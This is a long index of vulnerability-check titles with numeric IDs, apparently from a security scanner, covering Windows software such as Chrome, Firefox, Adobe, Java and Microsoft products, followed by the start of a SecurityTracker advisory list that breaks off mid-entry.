Wireshark LDP PPP and HSRP dissector Multiple Vulnerabilities (Windows) [802975] Google Chrome Windows Kernel Memory Corruption Vulnerability [802972] Google Chrome Multiple Vulnerabilities - Sep12 (Windows-01) [802962] Apple iTunes Multiple Vulnerabilities - Sep 12 (Windows) [802960] Adobe LiveCycle Designer Untrusted Search Path Vulnerability (Windows) [802954] Adobe Reader Multiple Unspecified Vulnerabilities - Windows [802952] Adobe Flash Player Multiple Vulnerabilities -01 August 12 (Windows) [802951] Oracle Java SE Java Runtime Environment Multiple Unspecified Vulnerabilities(02) - (Windows) [802950] Oracle Java SE Java Runtime Environment Unspecified Vulnerability - (Windows) [802949] Oracle Java SE Java Runtime Environment Multiple Unspecified Vulnerabilities(01) - (Windows) [802948] Oracle Java SE Java Runtime Environment Multiple Unspecified Vulnerabilities - (Windows) [802947] Oracle Java SE Java Runtime Environment Code Execution Vulnerability - (Windows) [802945] Wireshark Multiple Vulnerabilities(01) - August 2012 (Windows) [802944] Wireshark Multiple Vulnerabilities - August 2012 (Windows) [802943] Wireshark GSM RLC MAC dissector Buffer Overflow Vulnerability (Windows) [802940] Adobe Flash Player Font Parsing Code Execution Vulnerability - (Windows) [802938] Adobe Shockwave Player Multiple Vulnerabilities - August 2012 (Windows) [802936] Adobe Reader Multiple Vulnerabilities - Windows [802935] Pidgin 'Libpurple' Cipher API Information Disclosure Vulnerability (Windows) [802932] Google Chrome PDF Viewer Multiple Vulnerabilities (Windows) [802928] Google Chrome Multiple Vulnerabilities - August 12 (Windows) [802925] Apple Safari Multiple Vulnerabilities - Aug 2012 (Windows) [802922] VLC Media Player OGG Demuxer Buffer Overflow Vulnerability (Windows) [802920] VLC Media Player 'MP4' Denial of Service Vulnerability (Windows) [802917] Google Chrome Multiple Vulnerabilities(01) - July 12 (Windows) [802912] Microsoft Unauthorized Digital Certificates Spoofing Vulnerability (2728973) [802907] Wireshark Multiple Denial of Service Vulnerabilities - July 12 (Windows) [802906] Pidgin MSN and XMPP Denial of Service Vulnerabilities (Windows) [802898] Wireshark PPP And NFS Dissector Denial of Service Vulnerabilities (Windows) [802895] Mozilla Products Memory Corruption Vulnerabilities - July12 (Windows) [802893] Mozilla Products Certificate Page Clickjacking Vulnerability (Windows) [802891] Mozilla Firefox Multiple Vulnerabilities - July12 (Windows) [802889] Mozilla Products Multiple Vulnerabilities - July12 (Windows) [802886] Microsoft Sidebar and Gadgets Remote Code Execution Vulnerability (2719662) [802880] Google Chrome Multiple Vulnerabilities - July 12 (Windows) [802871] Adobe Flash Player Multiple Vulnerabilities June-2012 (Windows) [802869] Mozilla Products 'jsinfer.cpp' Denial of Service Vulnerability (Windows) [802865] Mozilla Products Multiple Vulnerabilities - June12 (Windows) [802864] Microsoft XML Core Services Remote Code Execution Vulnerability (2719615) [802848] Google Chrome Multiple Denial of Service Vulnerabilities - May 12 (Windows) [802842] Mozilla Products Security Bypass Vulnerability - May12 (Windows) [802840] Mozilla Products Multiple Vulnerabilities - May12 (Windows) [802835] Google Chrome Multiple Vulnerabilities-02 - April 12 (Windows) [802820] Mozilla Products Multiple Vulnerabilities - Mar12 (Windows) [802811] Adobe Flash Player Multiple Vulnerabilities (Windows) - Mar12 [802807] Google Chrome Multiple Denial of Service Vulnerabilities - March12 (Windows) [802806] Microsoft IIS Default Welcome Page Information Disclosure Vulnerability [802803] Adobe Flash Player Multiple Vulnerabilities (Windows) - Feb12 [802796] Apple Safari Webkit Multiple Vulnerabilities - May 12 (Windows) [802795] Apple QuickTime Multiple Vulnerabilities - (Windows) [802792] Google Chrome Multiple Vulnerabilities - May 12 (Windows) [802790] Adobe Illustrator Multiple Unspecified Vulnerabilities (Windows) [802782] Adobe Photoshop BOF and Use After Free Vulnerabilities (Windows) [802781] Adobe Flash Professional JPG Object Processing BOF Vulnerability (Windows) [802779] Adobe Shockwave Player Multiple Code Execution and DoS Vulnerabilities (Windows) [802774] Microsoft VPN ActiveX Control Remote Code Execution Vulnerability (2695962) [802772] Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Windows) [802761] Wireshark Multiple Vulnerabilities - April 12 (Windows) [802760] Wireshark IEEE 802.11 Dissector Denial of Service Vulnerability (Windows) [802759] Wireshark Multiple Denial of Service Vulnerabilities - April 12 (Windows) [802748] Adobe Reader Multiple Vulnerabilities April-2012 (Windows) [802732] Google Chrome Multiple Vulnerabilities - April 12 (Windows) [802726] Microsoft SMB Signing Disabled [802722] VLC Media Player Multiple Vulnerabilities - Mar 12 (Windows) [802717] Google Chrome 'History navigation' Arbitrary Code Execution Vulnerability (Windows) [802714] Google Chrome 'GPU process' Multiple Vulnerabilities (Windows) [802713] Pidgin Multiple Denial of Service Vulnerabilities (Windows) [802708] Microsoft Internet Explorer Code Execution and DoS Vulnerabilities [802700] Google Chrome 'HTTP session' Information Disclosure Vulnerability (Windows) [802684] IBM Director CIM Server CIMListener Directory Traversal Vulnerability (Windows) [802681] Oracle Java SE Hash Collision DoS Vulnerability (Windows) [802680] Oracle Java SE 'MurmurHash' Algorithm Hash Collision DoS Vulnerability (Windows) [802677] CA ARCserve Backup RPC Services Multiple Vulnerabilities (Windows) [802670] PHP pdo_sql_parser.re 'PDO' extension DoS vulnerability (Windows) [802652] Opera URL Processing Arbitrary Code Execution Vulnerability (Windows) [802649] Opera Multiple Denial of Service Vulnerabilities - June12 (Windows) [802646] Opera Multiple Vulnerabilities - June12 (Windows) [802612] Oracle Java SE JRE Multiple Vulnerabilities - February 2012 (Windows - 03) [802611] Oracle Java SE JRE Multiple Vulnerabilities - February 2012 (Windows - 02) [802610] Oracle Java SE JRE Multiple Vulnerabilities - February 2012 (Windows - 01) [802600] IBM SPSS SamplePower 'VsVIEW6' ActiveX Control Multiple Code Execution Vulnerabilities (Windows) [802597] Google Chrome Multiple Vulnerabilities - February 12 (Windows 01) [802594] Google Chrome Multiple Vulnerabilities - February 12 (Windows) [802592] Mozilla Products XBL Binding Memory Corruption Vulnerability - (Windows) [802591] PHP 'magic_quotes_gpc' Directive Security Bypass Vulnerability (Windows) [802590] PHP 'php_register_variable_ex()' Remote Code Execution Vulnerability (Windows) [802581] Mozilla Products Multiple Unspecified Vulnerabilities - Feb12 (Windows 01) [802580] Mozilla Products Multiple Unspecified Vulnerabilities - Feb12 (Windows) [802579] Mozilla Products IPv6 Literal Syntax Cross Domain Information Disclosure Vulnerability (Windows) [802566] PHP Multiple Denial of Service Vulnerabilities (Windows) [802562] Strawberry Perl Modules Multiple Vulnerabilities (Windows) [802558] Adobe Reader/Acrobat Multiple Memory Corruption Vulnerabilities - Windows [802557] LibreOffice 'DOC' File Denial of Service Vulnerability (Windows) [802547] Mozilla Firefox Cache Objects History Enumeration Weakness Vulnerability (Windows) [802545] Mozilla Products Multiple Information Disclosure Vulnerabilities - (Windows) [802542] Adobe Reader/Acrobat 'U3D' Component Memory Corruption Vulnerability - Windows [802540] Adobe Flash Player 'SWF' File Multiple Code Execution Vulnerability - Windows [802518] Mozilla Products XSS and Memory Corruption Vulnerabilities (Windows) [802517] Mozilla Products Privilege Escalation Vulnerabily (Windows) [802511] Mozilla Products Multiple Vulnerabilities (Windows) [802510] Mozilla Products Browser Engine Denial of Service Vulnerabilities (Windows) [802509] Mozilla Products 'NoWaiverWrapper' Privilege Escalation Vulnerability (Windows) [802508] Adobe Shockwave Player Multiple Vulnerabilities (Windows) - Nov 2011 [802505] FFFTP Untrusted Search Path Vulnerability (Windows) [802504] PHP 'is_a()' Function Remote Arbitrary Code Execution Vulnerability (Windows) [802503] Wireshark CSN.1 Dissector Denial of Service Vulnerability (Windows) [802502] Wireshark Heap Based BOF and Denial of Service Vulnerabilities (Windows) [802499] Apple Safari Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability (Windows) [802496] Google Chrome Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability (Windows) [802490] Google Chrome Multiple Vulnerabilities - Nov2012 (Windows) [802488] VLC Media Player 'libpng_plugin' Denial of Service Vulnerability (Windows) [802485] Adobe Shockwave Player Multiple Vulnerabilities Nov-2012 (Windows) [802482] Oracle Java SE JRE Multiple Unspecified Vulnerabilities-04 oct12 (Windows) [802481] Oracle Java SE JRE Multiple Unspecified Vulnerabilities-03 oct12 (Windows) [802480] VLC Media Player TiVo Demuxer Double Free Vulnerability (Windows) [802479] Oracle Java SE JRE Multiple Unspecified Vulnerabilities-02 oct12 (Windows) [802478] Oracle Java SE JRE Multiple Unspecified Vulnerabilities-01 Oct (Windows) [802473] Google Chrome Multiple Vulnerabilities-02 Oct12 (Windows) [802470] Google Chrome Multiple Vulnerabilities-01 Oct12 (Windows) [802468] Compatibility Issues Affecting Signed Microsoft Binaries (2749655) [802462] Microsoft ActiveSync Null Pointer Dereference Denial Of Service Vulnerability [802451] Google Chrome Multiple Vulnerabilities - Sep12 (Windows) [802450] Opera Address Bar Spoofing Vulnerability (Windows) [802444] XnView Multiple Image Decompression Heap Overflow Vulnerabilities (Windows) [802443] XnView PSD Record Type Parsing Integer Overflow Vulnerabilities (Windows) [802435] Opera 'X.509' Certificates Spoofing Vulnerability (Windows) [802420] VLC Media Player '.amr' File Denial of Service Vulnerability (Windows) [802403] MS Windows Fraudulent Digital Certificates Spoofing Vulnerability (2641690) [802398] Adobe Shockwave Player Multiple Vulnerabilities - Feb 2012 (Windows) [802395] Opera Large Integer Argument Denial of Service Vulnerability (Windows) [802374] Google Chrome Multiple Denial of Service Vulnerabilities - January12 (Windows) [802365] Opera Cache History Information Disclosure Vulnerability (Windows) [802363] Opera Multiple Information Disclosure Vulnerabilities (Windows) [802361] Opera Multiple Vulnerabilities - December11 (Windows) [802358] Google Chrome Cache History Information Disclosure Vulnerabilities (Windows) [802355] Google Chrome Multiple Information Disclosure Vulnerabilities (Windows) [802349] PHP EXIF Header Denial of Service Vulnerability (Windows) [802345] Google Chrome Multiple Vulnerabilities - November11 (Windows) [802343] ChaSen Buffer Overflow Vulnerability (Windows) [802338] Google Chrome Mozilla Network Security Services Privilege Escalation Vulnerability (Windows) [802332] Opera Extended Validation Information Disclosure Vulnerabilities (Windows) [802330] PHP Multiple Vulnerabilities (Windows) - Sep 2011 [802326] Google Chrome multiple vulnerabilities - September11 (Windows) [802316] Google Chrome Multiple Vulnerabilities - August11 (Windows) [802314] Ecava IntegraXor Multiple Cross-Site Scripting Vulnerabilities (Windows) [802313] Google Picasa JPEG Image Processing Remote Code Execution Vulnerability (Windows) [802309] XnView File Search Path Executable File Injection Vulnerability (Windows) [802303] Google Chrome WebGL Texture Information Disclosure Vulnerability (Windows) [802300] Tor Directory Authority 'policy_summarize' Denial of Service Vulnerability (Windows) [802292] IBM Informix Dynamic Server 'oninit.exe' Buffer Overflow Vulnerability (Windows) [802287] Microsoft Internet Explorer Cache Objects History Information Disclosure Vulnerability [802286] Microsoft Internet Explorer Multiple Information Disclosure Vulnerabilities [802284] Apple Safari JavaScript Implementation Information Disclosure Vulnerability (Windows) [802282] Apple Safari WebKit Information Disclosure Vulnerability (Windows) [802278] Oracle Java SE Java Runtime Environment Unspecified Vulnerability - October 2011 (Windows) [802277] Oracle Java SE Java Runtime Environment Unspecified Vulnerability - October 2011 (Windows) [802276] Oracle Java SE Multiple Vulnerabilities - October 2011 (Windows04) [802275] Oracle Java SE Multiple Vulnerabilities - October 2011 (Windows03) [802274] Oracle Java SE Multiple Vulnerabilities - October 2011 (Windows02) [802273] Oracle Java SE Multiple Vulnerabilities - October 2011 (Windows01) [802262] Google Chrome Multiple Vulnerabilities - October11 (Windows) [802255] Google Chrome Multiple Vulnerabilities - October11 (Windows) [802249] Wireshark Lua Script File Arbitrary Code Execution Vulnerability (Windows) [802248] Wireshark Multiple Denial of Service Vulnerabilities (Windows) [802237] Apple Safari Secure Cookie Security Bypass Vulnerability (Windows) [802227] IBM Lotus Symphony Multiple Vulnerabilities (Windows) [802219] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 04 [802218] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 03 [802217] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 02 [802216] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 01 [802215] Mozilla Firefox Security Bypass Vulnerability July-11 (Windows) [802214] Mozilla Products Multiple Denial of Service Vulnerabilities July-11 (Windows) [802213] Mozilla Products Multiple Vulnerabilities July-11 (Windows) [802212] Mozilla Firefox Multiple Vulnerabilities July-11 (Windows) [802211] Mozilla Products WebGL Information Disclosure Vulnerability July-11 (Windows) [802206] Adobe Products Unspecified Cross-Site Scripting Vulnerability June-2011 (Windows) [802203] Microsoft Internet Explorer Cookie Hijacking Vulnerability [802202] Microsoft Internet Explorer Cookie Hijacking Vulnerability [802201] Wireshark 'bytes_repr_len' Function Denial of Service Vulnerability (Windows) [802200] Wireshark Multiple Denial of Service Vulnerabilities (Windows) [802198] Apple QuickTime Multiple Denial of Service Vulnerabilities - (Windows) [802175] Mozilla Products Multiple Vulnerabilities - Oct 2011 (Windows 01) [802174] Mozilla Products Enter Key Dialog Bypass and Use-After-Free Memory Corruption Vulnerabilities (Windows) [802173] Mozilla Products 'YARR' Code Execution Vulnerability (Windows) [802172] Mozilla Products Same Origin Policy Bypass Vulnerability (Windows) [802171] Mozilla Products Browser Engine Multiple Unspecified Vulnerabilities (Windows) [802170] Mozilla Firefox Memory Corruption and Integer Underflow Vulnerabilities (Windows) [802169] Mozilla Products Multiple Vulnerabilities - Oct 2011 (Windows) [802166] Adobe Reader and Acrobat Multiple Vulnerabilities September-2011 (Windows) [802165] Adobe Reader Unspecified Vulnerability (Windows) [802153] Mozilla Products Multiple Vulnerabilities - Sep 11 (Windows) [802152] Mozilla Products Information Disclosure and Security Bypass Vulnerabilities (Windows) [802151] Mozilla Products Multiple Vulnerabilities - Sep 11 (Windows) [802150] Mozilla Products Multiple Vulnerabilities (Windows) [802149] Mozilla Firefox Untrusted Search Path Vulnerability (Windows) [802147] Mozilla Products 'SVG' Code Execution Vulnerability (Windows) [802141] Opera 'HTTPS-Session' Multiple Vulnerabilities (Windows) [802138] Mozilla Firefox Multiple Vulnerabilities August-11 (Windows) [802133] Apple QuickTime Multiple Buffer Overflow Vulnerabilities (Windows) [802126] Google Chrome 'GetWidget' methods DoS Vulnerability (Windows) [802119] VLC Media Player 'AMV' Denial of Service Vulnerability (Windows) [802113] Opera Browser 'SRC' Denial of Service Vulnerability (Windows) [802112] Opera Browser Multiple Vulnerabilities Jul-11 (Windows) [802111] Opera Browser Multiple Vulnerabilities Jul-11 (Windows) [802110] Adobe Reader and Acrobat Multiple BOF Vulnerabilities June-2011 (Windows) [802107] Opera Browser Multiple Vulnerabilities Jul-11 (Windows) [802102] Google Chrome Multiple Vulnerabilities - June 11(Windows) [802100] Mozilla Firefox SSL Certificate Spoofing Vulnerability (Windows) [801951] Novell iPrint Client 'printer-url' Multiple BOF Vulnerabilities (Windows) [801935] Microsoft Silverlight Multiple Memory Leak Vulnerabilities [801934] Microsoft Silverlight Version Detection [801921] Adobe Products Arbitrary Code Execution Vulnerability (Windows) [801905] Mozilla Products Browser Engine Multiple Unspecified Vulnerabilities March-11 (Windows) [801904] Mozilla Products Buffer Overflow Vulnerability March-11 (Windows) [801903] Mozilla Products Multiple Unspecified Vulnerabilities March-11 (Windows) [801902] Mozilla Products Multiple Vulnerabilities March-11 (Windows) [801898] TigerVNC SSL Certificate Validation Security Bypass Vulnerability (Windows) [801897] TigerVNC Version Detection (Windows) [801890] Google Chrome Multiple Denial of Service Vulnerabilities - May11 (Windows) [801887] Mozilla Products Unspecified Vulnerability May-11 (Windows) [801886] Mozilla Firefox Multiple Unspecified Vulnerabilities May-11 (Windows) [801885] Mozilla Products Multiple Vulnerabilities May-11 (Windows) - 02 [801884] Mozilla Products Multiple Vulnerabilities May-11 (Windows) - 01 [801883] Mozilla Products Multiple Vulnerabilities May-11 (Windows) [801878] Google Chrome multiple vulnerabilities - May11 (Windows) [801876] Microsoft Internet Explorer 'msxml.dll' Information Disclosure Vulnerability [801875] Mozilla Firefox Information Disclosure Vulnerability (Windows) [801872] Synergy Protocol Information Disclosure Vulnerability (Windows) [801871] Synergy Version Detection (Windows) [801855] Google Chrome multiple vulnerabilities - March 11 (Windows) [801847] Adobe Flash Player Multiple Vulnerabilities February-2011 (Windows) [801844] Adobe Reader and Acrobat Multiple Vulnerabilities February-2011 (Windows) [801831] Microsoft Internet Explorer Incorrect GUI Display Vulnerability [801830] Microsoft Internet Explorer 'ReleaseInterface()' Remote Code Execution Vulnerability [801825] Google Chrome multiple vulnerabilities - Jan11 (Windows) [801797] Python Multiple Vulnerabilities (Windows) [801795] Python Version Detection (Windows) [801792] Adobe Flash Player Multiple Vulnerabilities May-2011 (Windows) [801790] Perl Denial of Service Vulnerability (Windows) [801789] Google Chrome 'Sandbox' Remote Code Execution Vulnerability (Windows) [801788] Opera Browser 'SELECT' HTML Tag Remote Memory Corruption Vulnerability (Windows) [801786] Wireshark Denial of Service and Buffer Overflow Vulnerabilities (Windows) [801785] Wireshark X.509if Dissector Denial of service vulnerability (Windows) [801784] VLC Media Player 'MP4_ReadBox_skcr()' Buffer Overflow Vulnerability (Windows) [801782] VLC Media Player 'Bookmark Creation' Buffer Overflow Vulnerability (Windows) [801779] RealNetworks RealPlayer 'OpenURLInDefaultBrowser()' Code Execution Vulnerability (Windows) [801776] Google Chrome 'GPU process' Multiple Code Execution Vulnerabilities (Windows) [801773] Google Chrome 'WebKit' CSS Implementation DoS Vulnerability (Windows) [801772] Rsync Multiple Denial of Service Vulnerabilities (Windows) [801771] Perl Laundering Security Bypass Vulnerability (Windows) [801770] Google Picasa Insecure Library Loading Arbitrary Code Execution Vulnerability (Windows) [801769] Google Picasa Version Detection (Windows) [801768] RealNetworks RealPlayer IVR File Processing Buffer Overflow Vulnerability (Windows) [801763] Google Chrome Multiple Vulnerabilities - March 11(Windows) [801761] Wireshark Denial of Service Vulnerability March-11 (Windows) [801758] Wireshark Denial of Service Vulnerability March-11 (Windows) [801757] Wireshark Multiple Vulnerabilities March-11 (Windows) [801756] Wireshark Denial of Service Vulnerability - March-11 (Windows) [801755] Wireshark Multiple Vulnerabilities - March-11 (Windows) [801749] RealNetworks RealPlayer Buffer Overflow Vulnerability (Windows) [801747] Google Chrome Multiple Denial of Service Vulnerabilities - February 11(Windows) [801742] Wireshark Denial of Service Vulnerability (Windows) [801739] Google Chrome multiple vulnerabilities - February 11(Windows) [801728] Opera Browser Multiple Vulnerabilities Feb-11 (Windows) [801726] VLC Media Player 'CDG decoder' multiple buffer overflow vulnerabilities (Windows) [801725] Microsoft Products GDI Plus Remote Code Execution Vulnerabilities (954593) [801723] Vulnerability in Windows Services for UNIX Could Allow Elevation of Privilege (939778) [801721] Microsoft Active Directory Denial of Service Vulnerability (953235) [801715] Microsoft XML Core Services Remote Code Execution Vulnerability (936227) [801714] Vulnerabilities in Windows Media Player Could Allow Remote Code Execution (936782) [801709] Vulnerability in Windows Kernel Could Allow Elevation of Privilege (943078) [801708] Vulnerability in Windows Media File Format Could Allow Remote Code Execution [801707] Microsoft Internet Explorer mshtml.dll Remote Memory Corruption Vulnerability (942615) [801704] Microsoft Internet Information Services Privilege Elevation Vulnerability (942831) [801702] Microsoft Internet Explorer HTML Rendering Remote Memory Corruption Vulnerability (944533) [801680] Apple QuickTime Multiple vulnerabilities - Dec10 (Windows) [801678] Google Chrome multiple vulnerabilities - Dec10 (Windows) [801677] Microsoft WMI Administrative Tools ActiveX Control Remote Code Execution Vulnerabilities [801667] Google Chrome multiple vulnerabilities - Dec 10(Windows) [801637] Mozilla Firefox Security Bypass Vulnerability (Windows) [801629] Adobe Flash Player Multiple Vulnerabilities (Windows) [801606] Microsoft Internet Explorer 'mshtml.dll' Information Disclosure Vulnerability [801597] Microsoft Office Excel 2003 Invalid Object Type Remote Code Execution Vulnerability [801596] Microsoft Excel 2007 Office Drawing Layer Remote Code Execution Vulnerability [801595] Microsoft Office Excel Axis and Art Object Parsing Remote Code Execution Vulnerabilities [801594] Microsoft PowerPoint 2007 OfficeArt Atom Remote Code Execution Vulnerability [801581] MS Windows HID Functionality(Over USB) Code Execution Vulnerability [801561] VMware Products Tools Local Privilege Escalation Vulnerability (Windows) [801540] Google Chrome multiple vulnerabilities - November 10(Windows) [801530] Oracle Java SE Multiple Vulnerabilities (Windows) [801524] Adobe Acrobat and Reader Multiple Vulnerabilities -Oct10 (Windows) [801520] Microsoft IIS ASP Stack Based Buffer Overflow Vulnerability [801506] RealNetworks RealPlayer Multiple Vulnerabilities (Windows) [801499] Mozilla Products Multiple Vulnerabilities dec-10 (Windows) [801498] Mozilla Products Multiple Vulnerabilities dec-10 (Windows) [801497] Mozilla Products Multiple Vulnerabilities dec-10 (Windows) [801495] Opera Browser Multiple Vulnerabilities December-10 (Windows) [801491] Microsoft 'hxvz.dll' ActiveX Control Memory Corruption Vulnerability (948881) [801489] Microsoft Office Graphics Filters Remote Code Execution Vulnerabilities (968095) [801488] Microsoft Internet Explorer Data Stream Handling Remote Code Execution Vulnerability (947864) [801485] Microsoft Pragmatic General Multicast (PGM) Denial of Service Vulnerability (950762) [801481] Microsoft Wireless LAN AutoConfig Service Remote Code Execution Vulnerability (970710) [801480] Microsoft Web Services on Devices API Remote Code Execution Vulnerability (973565) [801477] Adobe Products Content Code Execution Vulnerability (Windows) [801475] Mozilla Firefox Unspecified Vulnerability Oct-10 (Windows) [801474] Opera Browser Multiple Vulnerabilities October-10 (Windows) [801473] Google Chrome multiple vulnerabilities - October 10(Windows) [801471] Mozilla Products Multiple Cross-site Scripting Vulnerabilities (Windows) [801470] Mozilla Products Multiple Unspecified Vulnerabilities October-10(Windows) [801469] Mozilla Products Unspecified Vulnerability (Windows) [801468] Mozilla Products Multiple Unspecified Vulnerabilities (Windows) [801467] Mozilla Products Multiple Vulnerabilities October-10 (Windows) [801465] Adobe Flash Player Untrusted search path vulnerability (windows) [801460] Google Chrome multiple unspecified vulnerabilities - October 10(Windows) [801452] Mozilla Products 'SJOW' Arbitrary Code Execution Vulnerability (Windows) [801451] Mozilla Products 'SJOW' Multiple Vulnerabilities (Windows) [801450] Mozilla Products Multiple Vulnerabilities sep-10 (Windows) [801447] Google Chrome multiple vulnerabilities (Windows) Sep10 [801429] VLC Media Player Meta-Information Denial of Service Vulnerability (Windows) [801423] Novell iPrint Client Multiple Security Vulnerabilities (Windows) [801399] MS Windows Insecure Library Loading Remote Code Execution Vulnerabilities (2269637) [801386] Mozilla Products Multiple Vulnerabilitie july-10 (Windows) [801385] Mozilla Products Multiple Vulnerabilities jul-10 (Windows) [801365] Adobe Acrobat and Reader Multiple Vulnerabilities -July10 (Windows) [801358] MS Windows Help and Support Center Remote Code Execution Vulnerability [801349] Microsoft Internet Explorer 'IFRAME' Denial Of Service Vulnerability (June-10) [801348] Microsoft Internet Explorer 'IFRAME' Denial Of Service Vulnerability -june 10 [801347] Mozilla Firefox 'IFRAME' Denial Of Service vulnerability (Windows) [801345] Microsoft .NET 'ASP.NET' Cross-Site Scripting vulnerability [801344] Microsoft .NET '__VIEWSTATE' Cross-Site Scripting vulnerability [801342] Microsoft ASP.NET Cross-Site Scripting vulnerability [801331] Opera Browser 'document.write()' Code execution Vulnerability (Windows) [801330] Microsoft Internet Explorer Cross Site Data Leakage Vulnerability [801329] Google Chrome Cross Site Data Leakage Vulnerability (Windows) [801319] VMware Products Multiple Vulnerabilities (Windows) [801302] Skype Extras Manager Unspecified Vulnerability (Windows) [801301] Skype Version Detection (Windows) [801257] Opera Browser Multiple Vulnerabilities August-10 (Windows) [801216] Opera 'IFRAME' Denial Of Service vulnerability (Windows) [801109] Microsoft IE CA SSL Certificate Security Bypass Vulnerability - Oct09 [801000] Visualization Library Multiple Unspecified Vulnerabilities (Windows) [800999] Visualization Library Version Detection (Windows) [800968] Microsoft SharePoint Team Services Information Disclosure Vulnerability [800967] Perl UTF-8 Regular Expression Processing DoS Vulnerability (Windows) [800966] Perl Version Detection (Windows) [800910] Microsoft Internet Explorer Buffer Overflow Vulnerability - Jul09 [800902] Microsoft Internet Explorer XSS Vulnerability - July09 [800872] Microsoft Internet Explorer 'li' Element DoS Vulnerability - Sep09 [800863] Microsoft Internet Explorer XML Document DoS Vulnerability - Aug09 [800861] Microsoft Internet Explorer 'findText()' Unicode Parsing DoS Vulnerability [800845] Microsoft Office Web Components ActiveX Control Code Execution Vulnerability [800829] Microsoft Video ActiveX Control 'msvidctl.dll' BOF Vulnerability [800770] Google Chrome Multiple Vulnerabilities Windows - May10 [800761] HP System Management Homepage Unspecified Vulnerability (Windows) [800755] Mozilla Products Firebug Code Execution Vulnerability (Windows) [800753] Mozilla Products Multiple Vulnerabilitie Apr-10 (Windows) [800752] Mozilla Products Multiple Code Execution vulnerabilities (Windows [800751] Mozilla Products 'nsTreeSelection' Denial of Service vulnerability (Windows) [800750] Mozilla Products Denial of Service Vulnerability (Windows) [800742] Microsoft Internet Explorer Unspecified vulnerability [800700] Microsoft GDIPlus PNG Infinite Loop Vulnerability [800669] Microsoft Internet Explorer Denial Of Service Vulnerability - July09 [800505] Microsoft HTML Help Workshop buffer overflow vulnerability [800499] Oracle Java SE Multiple Vulnerabilities (Windows) [800481] Microsoft SharePoint Cross Site Scripting Vulnerability [800461] Microsoft Internet Explorer Information Disclosure Vulnerability (980088) [800435] Google SketchUp Multiple Vulnerabilities (Windows) [800429] Microsoft Internet Explorer Remote Code Execution Vulnerability (979352) [800382] Microsoft PowerPoint File Parsing Remote Code Execution Vulnerability (967340) [800347] Microsoft Internet Explorer Clickjacking Vulnerability [800343] Microsoft Word 2007 Sensitive Information Disclosure Vulnerability [800337] Microsoft Internet Explorer NULL Pointer DoS Vulnerability [800267] Microsoft GDIPlus Library File Integer Overflow Vulnerability [800247] Wireshark Multiple Vulnerabilities Feb-09 (Windows) [800218] Microsoft Money 'prtstb06.dll' Denial of Service vulnerability [800217] Microsoft Money Version Detection [800215] PGP Desktop Version Detection (Windows) [800209] Microsoft Internet Explorer Version Detection (Win) [800208] Microsoft Internet Explorer Anti-XSS Filter Vulnerabilities [800192] HP SMH Insight Diagnostics Cross Site Scripting Vulnerability - Windows [800120] Google Chrome Version Detection (Windows) [800106] Adobe Reader/Acrobat JavaScript Method Handling Vulnerability (Windows) [800083] Microsoft Outlook Express Malformed MIME Message DoS Vulnerability [800082] Microsoft SQL Server sp_replwritetovarbin() BOF Vulnerability [800040] Wireshark Multiple Vulnerabilities - Oct08 (Windows) [800016] Mozilla SeaMonkey Version Detection (Windows) [800000] VMWare products version detection (Windows) [103254] Microsoft SharePoint Server 2007 '_layouts/help.aspx' Cross Site Scripting Vulnerability [102015] Microsoft RPC Interface Buffer Overrun (KB824146) [101100] Vulnerabilities in Microsoft ATL Could Allow Remote Code Execution (973908) [101018] Windows SharePoint Services detection [101017] Microsoft MS03-018 security check [101016] Microsoft MS03-022 security check [101015] Microsoft MS03-034 security check [101014] Microsoft MS00-078 security check [101012] Microsoft MS03-051 security check [101010] Microsoft Security Bulletin MS05-004 [101009] Microsoft Security Bulletin MS06-033 [101007] Microsoft dotNET version grabber [101006] Microsoft Security Bulletin MS06-056 [101005] Microsoft Security Bulletin MS07-040 [101004] Microsoft MS04-017 security check [101003] Microsoft MS00-058 security check [101000] Microsoft MS00-060 security check [100952] Microsoft IIS FTPd NLST stack overflow [100950] Microsoft DNS server internal hostname disclosure detection [100608] Windows NT NNTP Component Buffer Overflow [100607] Microsoft SMTP Service and Exchange Routing Engine Buffer Overflow Vulnerability [100357] Cisco VPN Client for Windows 'StartServiceCtrlDispatche' Local Denial of Service Vulnerability [100062] Microsoft Remote Desktop Protocol Detection [96204] Get Windows Eventlog Entries over WMI [90020] Windows vulnerability in DNS Client Could Allow Spoofing (945553) [80007] Microsoft MS00-06 security check [64922] Debian Security Advisory DSA 1890-1 (wxwindows2.4 wxwidgets2.6 wxwidgets2.8) [20377] Windows Server Update Services detection [14229] HTTP Directory Traversal (Windows) [13752] Denial of Service (DoS) in Microsoft SMS Client [11992] Vulnerability in Microsoft ISA Server 2000 H.323 Filter(816458) [11887] Buffer Overflow in Windows Troubleshooter ActiveX Control (826232) [11808] Microsoft RPC Interface Buffer Overrun (823980) [11443] Microsoft IIS UNC Mapped Virtual Host Vulnerability [11433] Microsoft ISA Server DNS - Denial Of Service (MS03-009) [11429] Windows Messenger is installed [11217] Microsoft's SQL Version Query [11177] Flaw in Microsoft VM Could Allow Code Execution (810030) [11160] Windows Administrator NULL FTP password [11147] Unchecked Buffer in Windows Help(Q323255) [11146] Microsoft RDP flaws could allow sniffing and DOS(Q324380) [11091] Windows Network Manager Privilege Elevation (Q326886) [11067] Microsoft's SQL Hello Overflow [10964] Windows Debugger flaw can Lead to Elevated Privileges (Q320206) [10930] HTTP Windows 98 MS/DOS device names DOS [10929] FTP Windows 98 MS/DOS device names DOS [10862] Microsoft's SQL Server Brute Force [10755] Microsoft Exchange Public Folders Information Leak [10680] Test Microsoft IIS Source Fragment Disclosure [10674] Microsoft's SQL UDP Info Query [10673] Microsoft's SQL Blank Password [10491] ASP/ASA source using Microsoft Translate f: bug [10144] Microsoft SQL TCP/IP listener is running SecurityTracker - https://www.securitytracker.com: [1028903] Microsoft Windows Unicode Scripts Processor Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1028754] Microsoft Windows Defender Pathname Bug Lets Local Users Gain Elevated Privileges [1028748] Microsoft Windows GDI+ TrueType Font Parsing Flaw Lets Remote Users Execute Arbitrary Code [1027934] Microsoft Windows Includes Some Invalid TURKTRUST Certificates [1027389] Microsoft Visual Basic Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027385] Microsoft Visual FoxPro Windows Common Controls (MSCOMCTL.OCX) Bug 